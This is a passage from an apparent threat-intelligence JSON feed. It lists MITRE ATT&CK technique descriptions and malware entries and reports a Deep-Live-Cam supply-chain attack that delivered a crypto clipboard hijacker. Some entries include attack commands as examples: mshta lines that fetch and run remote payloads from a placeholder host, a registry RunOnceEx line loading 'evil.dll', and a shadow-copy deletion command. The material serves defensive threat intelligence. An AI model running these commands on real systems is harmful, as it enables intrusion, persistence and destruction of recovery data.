raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", "created_on": "2020-12-03T14:38:09.000Z", "name": "Keylogging"}, {"id": "0d1f1170-5c5e-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\<username>\\Documents\\Outlook Files` or `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", "created_on": "2021-01-22T03:00:58.000Z", "name": "Local Email Collection"}, {"id": "bce5e493-305c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso.(Citation: Mandiant Trojanized Windows 10)\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) \n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", "created_on": "2020-11-27T03:00:42.000Z", "name": "Malicious File"}, {"id": "bce1ab72-305c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).", "created_on": "2020-11-27T03:00:42.000Z", "name": "Malicious Link"}, {"id": "beab4bcf-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Masquerade Task or Service"}, {"id": "d154df03-e4e5-4db2-8cc9-28148339554b", "category": "trellix-tool", "description": "Metamorfo is a Latin American banking trojan wielded by a Brazilian cybercrime group active since at least April 2018. This group's primary targets are financial institutions and cryptocurrency services located in Brazil and Mexico.", "created_on": "2021-12-27T12:14:24.000Z", "name": "Metamorfo"}, {"id": "9dc61adb-e1bf-11ea-9477-02d538d9640e", "category": "country", "description": "Mexico", "created_on": "2020-08-19T01:59:29.000Z", "name": "mexico"}, {"id": "b3126640-cc20-4ff1-b49c-849bef785430", "category": "trellix-tool", "description": "Mobsync.exe is a legitimate Microsoft process known as the Microsoft Synchronization Manager that runs in the background to automatically synchronize offline web pages, network folders, and connected mobile devices with a user's local system.", "created_on": "2026-09-11T00:12:24.000Z", "name": "mobsync.exe"}, {"id": "c3ce2246-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\n\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\n\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\n\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Modify Registry"}, {"id": "bc78cc38-39ca-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))</code>\n\nThey may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", "created_on": "2020-12-09T03:00:47.000Z", "name": "Mshta"}, {"id": "9bc8e411-0ffc-4b8c-9322-28120b1d4f2f", "category": "trellix-tool", "description": "Mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion. These capabilities make Mshta an appealing vehicle for adversaries to proxy execution of arbitrary script code through a trusted, signed utility, making it a reliable technique during both initial and later stages of an infection.\r\nSource: https://redcanary.com/threat-detection-report/techniques/mshta/", "created_on": "2022-05-25T21:16:00.000Z", "name": "Mshta"}, {"id": "9dc9fbf5-e1bf-11ea-9477-02d538d9640e", "category": "country", "description": "Peru", "created_on": "2020-08-19T01:59:29.000Z", "name": "peru"}, {"id": "c3ff7caa-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", "created_on": "2020-02-26T13:49:10.000Z", "name": "Process Injection"}, {"id": "9cc8ce6a-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Registry Run Keys / Startup Folder"}, {"id": "29b3deb0-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", "created_on": "2020-12-18T13:23:05.000Z", "name": "Regsvcs/Regasm"}, {"id": "9c9950f5-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Software Packing"}, {"id": "bed41cbd-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an \u201c@\u201d symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also utilize links to perform consent phishing/spearphishing campaigns to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured into granting adversaries permissions/access via a malicious OAuth 2.0 request URL that when accepted by the user provide permissions/access for malicious applications.(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nSimilarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as \u201cdevice code phishing,\u201d an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Spearphishing Link"}, {"id": "682ca0e1-3dfd-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", "created_on": "2020-12-14T11:13:34.000Z", "name": "Standard Encoding"}, {"id": "3c5609a5-3683-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", "created_on": "2020-12-04T22:51:24.000Z", "name": "System Checks"}, {"id": "c3f17bf6-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\n\n[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) ", "created_on": "2020-02-26T13:49:10.000Z", "name": "System Information Discovery"}, {"id": "ab3526d4-f16a-430b-93b7-4a4ef63bf98a", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelg\u00e4nging May 2018)\n\nOn a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.", "created_on": "2021-10-29T13:08:58.000Z", "name": "System Language Discovery"}, {"id": "43d9ee16-b4b4-11eb-9d72-02d538d9640e", "category": "mitre-attack-pattern", "description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)", "created_on": "2021-05-14T12:59:49.000Z", "name": "System Location Discovery"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}, {"id": "c39b5527-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being \u201cdisabled by default\u201d on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Windows Management Instrumentation"}], "metrics": [{"date": "2026-09-11", "nodes": 0.39, "events": 0.86, "sectors": [{"sector": "Various", "affected": 3.28, "events": 7.22, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.34, "events": 2.94, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 0.23, "events": 0.62, "sectors": [{"sector": "Unknown", "affected": 1.97, "events": 5.25, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.53, "events": 1.34, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 1.56, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 0.08, "events": 0.16, "sectors": [{"sector": "Various", "affected": 0.66, "events": 1.31, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.27, "events": 0.53, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 0.55, "events": 1.02, "sectors": [{"sector": "Various", "affected": 4.6, "events": 8.54, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.6, "events": 2.94, "total": 1000000}, {"iso_code": "CO", "affected": 9.98, "events": 19.96, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 0.39, "events": 0.86, "sectors": [{"sector": "Unknown", "affected": 3.28, "events": 7.22, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.07, "events": 2.14, "total": 1000000}, {"iso_code": "EC", "affected": 51.24, "events": 153.71, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 0.23, "events": 1.25, "sectors": [{"sector": "Various", "affected": 1.97, "events": 10.51, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.8, "events": 4.28, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "ea334e03-7d3f-4d99-bab7-669c58e8d23e", "threat_level_id": 2, "description": "On September 8, 2026, an attacker modified Deep-Live-Cam's requirements.txt to redirect installation to a malicious source dependency hosted at pypls/requests. Deep-Live-Cam is a Python face-swapping application with 96,600 GitHub stars. The malicious dependency executes hidden code during pip installation via a setup.py file containing 434 spaces that push malicious code beyond typical editor visibility. The code downloads a cryptocurrency clipboard hijacker from a Telegraph page that replaces cryptocurrency wallet addresses in clipboard text with attacker-controlled addresses. The payload supports Windows and macOS, establishing persistence through Windows Registry Run keys and macOS LaunchAgents. The malicious revision remained on the main branch for approximately 9 hours and 39 minutes before being reverted. The maintainer reported unusual account access despite two-factor authentication, supporting an account compromise assessment. The evidence establishes malicious behavior in the code but does not establish infection counts or financial losses. The payload includes validation for Bitcoin, Ethereum, Tron, and Solana addresses.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by SafeDep and shared publicly https://safedep.io/deep-live-cam-supply-chain-attack/", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://safedep.io/deep-live-cam-supply-chain-attack/"]}, "is_coat": 0, "name": "Deep-Live-Cam Supply Chain Attack Delivers Cryptocurrency Clipboard Hijacker", "prevalence": {"countries": [{"iso_code": "US", "affected": 11.5, "events": 45.47, "total": 1000000}, {"iso_code": "IT", "affected": 60.48, "events": 77.27, "total": 1000000}, {"iso_code": "SG", "affected": 83.78, "events": 199.78, "total": 1000000}, {"iso_code": "KR", "affected": 1028.31, "events": 1209.77, "total": 1000000}, {"iso_code": "TR", "affected": 52.81, "events": 134.43, "total": 1000000}, {"iso_code": "DE", "affected": 5.71, "events": 6.74, "total": 1000000}, {"iso_code": "JP", "affected": 19.45, "events": 19.45, "total": 1000000}, {"iso_code": "IN", "affected": 36.66, "events": 38.33, "total": 1000000}, {"iso_code": "TW", "affected": 104.01, "events": 145.62, "total": 1000000}, {"iso_code": "BR", "affected": 14, "events": 28, "total": 1000000}, {"iso_code": "FR", "affected": 6.49, "events": 8.11, "total": 1000000}, {"iso_code": "AU", "affected": 63.38, "events": 63.38, "total": 1000000}, {"iso_code": "CH", "affected": 40.54, "events": 40.54, "total": 1000000}, {"iso_code": "CZ", "affected": 40.37, "events": 40.37, "total": 1000000}, {"iso_code": "MY", "affected": 46.31, "events": 92.63, "total": 1000000}, {"iso_code": "PK", "affected": 134.04, "events": 178.72, "total": 1000000}, {"iso_code": "NO", "affected": 369.14, "events": 553.71, "total": 1000000}, {"iso_code": "PH", "affected": 51.71, "events": 51.71, "total": 1000000}, {"iso_code": "TH", "affected": 32.4, "events": 80.99, "total": 1000000}, {"iso_code": "VN", "affected": 7.3, "events": 10.94, "total": 1000000}, {"iso_code": "AT", "affected": 10.94, "events": 10.94, "total": 1000000}, {"iso_code": "CA", "affected": 3.76, "events": 11.29, "total": 1000000}, {"iso_code": "DO", "affected": 34.71, "events": 34.71, "total": 1000000}, {"iso_code": "ES", "affected": 